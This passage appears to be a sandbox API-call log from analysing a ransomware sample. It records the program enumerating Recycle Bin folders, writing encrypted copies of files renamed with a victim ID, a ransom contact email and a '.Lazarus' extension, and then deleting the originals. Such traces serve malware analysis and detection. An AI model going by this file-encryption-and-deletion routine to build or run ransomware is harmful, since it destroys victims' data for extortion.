MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.717] GetLastError () returned 0x0 [0060.717] SetLastError (dwErrCode=0x0) [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0060.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0060.718] GetLastError () returned 0x0 [0060.718] SetLastError (dwErrCode=0x0) [0060.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x690d0 [0060.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0060.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0060.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.718] AreFileApisANSI () returned 1 [0060.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0060.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc6) returned 0x31cd0 [0060.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x31cd0, cchWideChar=99 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 99 [0060.718] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.719] GetFileType (hFile=0x424) returned 0x1 [0060.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x31cd0 | out: hHeap=0x20000) returned 1 [0060.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.720] AreFileApisANSI () returned 1 [0060.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d790 [0060.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6d790, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.720] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.720] GetFileType (hFile=0x41c) returned 0x1 [0060.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.720] GetLastError () returned 0x0 [0060.720] SetLastError (dwErrCode=0x0) [0060.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.720] GetLastError () returned 0x0 [0060.720] SetLastError (dwErrCode=0x0) [0060.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.720] ReadFile (in: hFile=0x41c, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f030*=0x81, lpOverlapped=0x0) returned 1 [0060.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.722] ReadFile (in: hFile=0x41c, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0060.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0060.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0060.722] GetLastError () returned 0x0 [0060.722] SetLastError (dwErrCode=0x0) [0060.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1) returned 0x7cf70 [0060.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0060.722] GetLastError () returned 0x0 [0060.722] SetLastError (dwErrCode=0x0) [0060.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0060.722] WriteFile (in: hFile=0x424, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327ef70*=0x90, lpOverlapped=0x0) returned 1 [0060.723] GetLastError () returned 0x0 [0060.723] SetLastError (dwErrCode=0x0) [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.723] GetLastError () returned 0x0 [0060.723] SetLastError (dwErrCode=0x0) [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0060.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b218 | out: hHeap=0x20000) returned 1 [0060.724] CloseHandle (hObject=0x424) returned 1 [0060.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0060.725] CloseHandle (hObject=0x41c) returned 1 [0060.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0060.725] AreFileApisANSI () returned 1 [0060.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d108 [0060.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6d108, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.725] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.725] GetLastError () returned 0x5 [0060.725] GetLastError () returned 0x5 [0060.725] SetLastError (dwErrCode=0x5) [0060.725] GetLastError () returned 0x5 [0060.725] SetLastError (dwErrCode=0x5) [0060.726] GetLastError () returned 0x5 [0060.726] SetLastError (dwErrCode=0x5) [0060.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0060.726] GetLastError () returned 0x5 [0060.726] SetLastError (dwErrCode=0x5) [0060.726] AreFileApisANSI () returned 1 [0060.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0060.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d478 [0060.726] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=37 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini") returned 37 [0060.726] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-18\\desktop.ini")) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30fc0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0060.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.727] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x38, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x20320, ftLastWriteTime.dwLowDateTime=0x1, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x23, dwReserved1=0x0, cFileName="8", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧襐\x07̧비聐蠐\x08賂̧")) returned 0 [0060.729] FindClose (in: hFindFile=0x78950 | out: hFindFile=0x78950) returned 1 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.729] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0060.729] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0060.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0060.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0060.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0060.730] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0060.730] AreFileApisANSI () returned 1 [0060.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000", lpUsedDefaultChar=0x0) returned 62 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0060.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.730] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.730] AreFileApisANSI () returned 1 [0060.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0060.730] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e828 [0060.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=62 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 62 [0060.730] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.731] GetLastError () returned 0x5 [0060.731] GetLastError () returned 0x5 [0060.731] SetLastError (dwErrCode=0x5) [0060.731] GetLastError () returned 0x5 [0060.731] SetLastError (dwErrCode=0x5) [0060.731] GetLastError () returned 0x5 [0060.731] SetLastError (dwErrCode=0x5) [0060.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0060.731] AreFileApisANSI () returned 1 [0060.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0060.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e3e8 [0060.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=62 | out: lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000") returned 62 [0060.731] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000" (normalized: "c:\\$recycle.bin\\s-1-5-21-1051304884-625712362-2192934891-1000"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.731] GetLastError () returned 0x5 [0060.731] GetLastError () returned 0x5 [0060.731] SetLastError (dwErrCode=0x5) [0060.731] GetLastError () returned 0x5 [0060.731] SetLastError (dwErrCode=0x5) [0060.731] GetLastError () returned 0x5 [0060.731] SetLastError (dwErrCode=0x5) [0060.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0060.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.731] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0060.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.731] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.731] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0060.732] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x7a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x82570, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x7a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="57", cAlternateFileName="")) returned 0 [0060.732] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0060.732] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78950 [0060.732] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x11a5eef8, ftLastAccessTime.dwHighDateTime=0x1d3375b, ftLastWriteTime.dwLowDateTime=0x11a5eef8, ftLastWriteTime.dwHighDateTime=0x1d3375b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.732] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xcb9438a8, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xcb9438a8, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0060.732] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0060.732] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.732] HeapFree (in: 